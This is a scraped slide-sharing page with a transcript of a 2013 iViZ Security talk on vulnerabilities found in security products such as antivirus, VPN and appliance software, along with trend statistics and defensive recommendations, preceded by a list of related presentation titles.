© iViZ Security Inc 0 May 2013 Bikash Barai, Co-Founder & CEO Why Current Security Solutions Fail?

Slides:

Advertisements

Similar presentations

Advertisements

Incident Response Managing Security at Microsoft Published: April 2004.

Network Security Attack Analysis. cs490ns - cotter2 Outline Types of Attacks Vulnerabilities Exploited Network Attack Phases Attack Detection Tools.

Next Generation Endpoint Security Jason Brown Enterprise Solution Architect McAfee May 23, 2013.

By Hiranmayi Pai Neeraj Jain

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Introducing WatchGuard Dimension. Oceans of Log Data The 3 Dimensions of Big Data Volume –“Log Everything - Storage is Cheap” –Becomes too much data –

7 Effective Habits when using the Internet Philip O’Kane 1.

Cloud Computing Part #3 Zigmunds Buliņš, Mg. sc. ing 1.

Chapter 4 McGraw-Hill/Irwin Copyright © 2011 by The McGraw-Hill Companies, Inc. All rights reserved. Ethics and Information Security.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Sophos anti-virus and anti-spam for business OARNET October 13, 2004.

Customized solutions. Keep It Secure Contents  Protection objectives  Endpoint and server software  Protection.

Varun Sharma Security Engineer | ACE Team | Microsoft Information Security

Viruses, Hacking, and AntiVirus. What is a Virus? A type of Malware – Malware is short for malicious software A virus – a computer program – Can replicate.

Presenter Deddie Tjahjono.  Introduction  Website Application Layer  Why Web Application Security  Web Apps Security Scanner  About  Feature  How.

Barracuda Spam & Virus Firewall. Introduction to the Barracuda Spam & Virus Firewall Complete server protection –Spam Blocking (95+ percent) Extremely.

Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 

EICAR 2009, 12 May 2009 Checkvir Realtime Anti-Malware Testing and Certification Dr. Ferenc Leitold, Veszprog Ltd.

The Difficult Road To Cybersecurity Steve Katz, CISSP Security Risk Solutions Steve Katz, CISSP Security.

Antivirus Software Detects malware (not just viruses) May eliminate malware as well Often sold with firewalls Two approaches: Dictionary-based - Compares.

11 SECURING INTERNET MESSAGING Chapter 9. Chapter 9: SECURING INTERNET MESSAGING2 CHAPTER OBJECTIVES  Explain basic concepts of Internet messaging. 

Real Security for Server Virtualization Rajiv Motwani 2 nd October 2010.

Cedes.ba The art of security What is not security (what years of pen testing have shown us)

© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public 1 Version 4.1 ISP Responsibility Working at a Small-to-Medium Business or ISP – Chapter 8.

Web Security Demystified Justin C. Klein Keane Sr. InfoSec Specialist University of Pennsylvania School of Arts and Sciences Information Security and Unix.

© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public ITE PC v4.0 Chapter 1 1 Basic Security Networking for Home and Small Businesses – Chapter 8.

Drupal Security Securing your Configuration Justin C. Klein Keane University of Pennsylvania School of Arts and Sciences Information Security and Unix.

Security.NET Chapter 1. How Do Attacks Occur? Stages of attack Examples of attacker actions 1. FootprintRuns a port scan on the firewall 2. PenetrationExploits.

Hamdi Yesilyurt, MA Student in MSDF & PhD-Public Affaris SQL Riji Jacob MS Student in Computer Science.

Component 4: Introduction to Information and Computer Science Unit 8: Security Lecture 2 This material was developed by Oregon Health & Science University,

November 13, 2008 Ohio Information Security Forum Attack Surface of Web Applications James Walden Northern Kentucky University

IST 210 Web Application Security. IST 210 Introduction Security is a process of authenticating users and controlling what a user can see or do.

Attacks Against Database By: Behnam Hossein Ami RNRN i { }

Honeypot and Intrusion Detection System

Security Professional Services. Security Assessments Vulnerability Assessment IT Security Assessment Firewall Migration Custom Professional Security Services.

3-Protecting Systems Dr. John P. Abraham Professor UTPA.

Software Security Testing Vinay Srinivasan cell:

Attacking Applications: SQL Injection & Buffer Overflows.

10/14/2015 Introducing Worry-Free SecureSite. Copyright Trend Micro Inc. Agenda Problem –SQL injection –XSS Solution Market opportunity Target.

ANTIVIRUS SOFTWARE.  Antivirus software is the most widespread mechanism for defending individual hosts against threats associated with malicious software,

 Chapter 14 – Security Engineering 1 Chapter 12 Dependability and Security Specification 1.

Recent Internet Viruses & Worms By Doppalapudi Raghu.

12 Steps to Cloud Security A guide to securing your Cloud Deployment Vishnu Vettrivel Principal Engineering Lead,

Module 6: Designing Security for Network Hosts

Hacking Windows 9X/ME. Hacking framework Initial access physical access brute force trojans Privilege escalation Administrator, root privileges Consolidation.

MANAGED SECURITY TESTING PROACTIVELY MANAGING VULNERABILITIES.

Copyright © 2015 Cyberlight Global Associates Cyberlight GEORGIAN CYBER SECURITY & ICT INNOVATION EVENT 2015 Tbilisi, Georgia19-20 November 2015 Hardware.

CHAPTER 2 Laws of Security. Introduction Laws of security enable user make the judgment about the security of a system. Some of the “laws” are not really.

Computer Security By Duncan Hall.

Joe Budzyn Jeff Goeke-Smith Jeff Utter. Risk Analysis  Match the technologies used with the security need  Spend time and resources covering the most.

Page 1 Viruses. Page 2 What Is a Virus A virus is basically a computer program that has been written to perform a specific set of tasks. Unfortunately,

Global Mobile Anti-malware Market WEBSITE Single User License: US$ 2500 No of Pages: 55 Corporate User License: US$

Microsoft NDA Material Adwait Joshi Sr. Technical Product Manager Microsoft Corporation.

Internet security for the home Paul Norton MEng(Hons) MIEE Electronic engineer working for Pascall Electronics Ltd. on the Isle of Wight A talk on Internet.

Reach us at Call: | Visit:

Application Communities

Working at a Small-to-Medium Business or ISP – Chapter 8

Penetration Test Debrief

Secure Software Confidentiality Integrity Data Security Authentication

Protecting your mobile devices away from virus by a cloud-based approach Wei Wu.

 Security is a must today. If your device is not secure with updated antivirus then it is surely vulnerable to the attacks of dangerous viruses, spyware.

Intercept X for Server Early Access Program Sophos Tester

Cybersecurity Strategy

Nessus Vulnerability Scanning

AppExchange Security Certification

Lecture 2 - SQL Injection

6. Application Software Security

Presentation transcript:

© iViZ Security Inc 0 May 2013 Bikash Barai, Co-Founder & CEO Why Current Security Solutions Fail?

© iViZ Security Inc 1 May 2013 Introduction About iViZ – Cloud based Application Penetration Testing – Zero False Positive Guarantee – Business Logic Testing with 100% WASC coverage – 400+ customers. IDG Ventures Funded. – Gartner Hype Cycle mention About myself – Co-founder and CEO of iViZ – Worked in areas of AI, Anti-spam filters, Multi stage attack simulation etc – Love AI, Security, Entrepreneurship, Magic /Mind Reading

© iViZ Security Inc 2 May 2013 Vulnerabilities in Security Products

© iViZ Security Inc 3 May 2013 Symantec Appliance(9.5.x) DescriptionRating Out-of-band stored-XSS - delivered by Critical XSS (both reflective and stored) with session-hijackingHigh Easy CSRF to add a backdoor-administrator (for example)High SSH with backdoor user account + privilege escalation to rootHigh Ability for an authenticated attacker to modify the Web- application High Arbitrary file download was possible with a crafted URLMedium Unauthenticated detailed version disclosureLow Credits: Brian Smith

© iViZ Security Inc 4 May 2013 Trend Appliance(8.2.0.X) DescriptionRating Out-of-band stored-XSS in user-portal - delivered via Critical XSS (both reflective and stored) with session-hijackingHigh Easy CSRF to add a backdoor-administrator (for example)High Root shell via patch-upload feature (authenticated)High Blind LDAP-injection in user-portal login-screenHigh Directory traversal (authenticated)Medium Unauthenticated access to AdminUI logsLow Unauthenticated version disclosureLow Credits: Brian Smith

© iViZ Security Inc 5 May 2013 Microsoft Auto-update Hijacking MD5 collision attack to generate a counterfeit copy of a Microsoft Terminal Server Licensing Service certificate. Used the counterfeit certificate to sign code such that malware appeared like genuine Microsoft code and hence remained undetected.

© iViZ Security Inc 6 May 2013 Preboot Authentication Attacks iViZ identified flaws in numerous BIOS’s and pre- boot authentication and disk encryption software – Bitlocker, TrueCrypt, Mcaffee Safeboot, DriveCryptor, Diskcryptor, LILO, GRUB, HP Bios, Intel/Lenevo BIOS found to be vulnerable. Flaws resulted in disclosure of plaintext pre-boot authentication passwords. In some cases, an attacked could bypass pre-boot authentication.

© iViZ Security Inc 7 May 2013 Vulnerabilities in Anti-Virus Discovered by iViZ Security Antivirus products process different types of files having different file-formats. We found flaws in handling malformed compressed, packed and binary files in AVG, Sophos, Avast etc Some of the file formats for which we found flaws in AV products are – ISO, RPM, ELF, PE, UPX, LZH

© iViZ Security Inc 8 May 2013 More Vulnerabilities in AV products Detection Bypass – CVE : The Gzip file parser in AVG Anti- Virus, Bitdefender, F-Secure, Fortinet antiviruses, allows remote attackers to bypass malware detection via a.tar.gz file Denial of Service (DoS) – CVE : Unspecified vulnerability in McAfee Anti-virus (formerly WebShield SMTP) allows remote attackers to cause a denial of service via unknown vectors.

© iViZ Security Inc 9 May 2013 Vulnerabilities in VPN products Remote Code Execution – CVE : Cisco AnyConnect Secure Mobility Client 2.x does not properly validate binaries that are received by the downloader process, which allows remote attackers to execute arbitrary code. – CVE : Format string vulnerability in VPN in Apple iOS before 5.1 allows remote attackers to execute arbitrary code via a crafted racoon configuration file.

© iViZ Security Inc 10 May 2013 Report Findings

© iViZ Security Inc 11 May 2013 About the Report/Study iViZ used databases such as the Common Vulnerability Enumeration (CVE), Common Product Enumeration (CPE) and National Vulnerability Database (NVD) for the Analysis

© iViZ Security Inc 12 May 2013 Key Findings Vulnerabilities increasing at CAGR of 37.29% over the last 3 Years. Anti-Virus accounts for 49% of the vulnerabilities, next Firewall (24%) Top 3 Security vendors with maximum vulnerabilities: McAfee, Cisco followed by Symantec. Top 3 Security products with maximum vulnerabilities: Rising-Global’s Antivirus, Cisco’s Adaptive Security Appliance and Ikarus Virus Utilities. Access Control is the most prominent weakness in Security Products followed by Input Validation. SQL Injection is the least found vulnerability among Security products

© iViZ Security Inc 13 May 2013 Vulnerability Trends In All ProductsIn Security Products

© iViZ Security Inc 14 May 2013 Vulnerability by Product Types in 2012

© iViZ Security Inc 15 May 2013 Vulnerabilities by Vendors

© iViZ Security Inc 16 May 2013

© iViZ Security Inc 17 May 2013 Comparative Analysis

© iViZ Security Inc 18 May Predictions.. We predict an increase in attacks on security products, companies or solutions APT and Cyber-warfare makes “Security Products” as the next choice Majority of vulnerabilities discovered will not become public and shall remain in the hands of APT actors Security Products are “High Pay-off” targets since they are present in most systems More vulnerabilities would be sold in Zero Day – Black Market

© iViZ Security Inc 19 May 2013 What should we do to protect us? Test and Don’t Trust (blindly): Conduct proper due diligence of the security product Ask for audit reports Patch security products like any other product Treat security tools in similar manner as other tools during threat modeling Have proper detection and monitoring solutions and multi-layer defense

© iViZ Security Inc 20 May 2013 Thank You Blog: Linkedin: barai/0/7a4/669 Twitter: barai/0/7a4/669https://twitter.com/bikashbarai1 DISCLAIMER We have used well known vulnerability standards and database like Common Vulnerability Enumeration (CVE), Common Product Enumeration (CPE) and Nation Vulnerability Database (NVD). One of the major challenges we faced was in classifying the products into security and non- security products, as the current product standard (CPE) does not support it. We solved this challenge by considering that security products have certain keywords like, ‘ ID‘virus’, ‘firewall‘, ‘IPS‘, ‘scan’ etc. Hence there are chances of some date being missed and the report should be considered as indicative. iViZ disclaims all warranties, expressed or implied, with respect to this research for any particular purpose.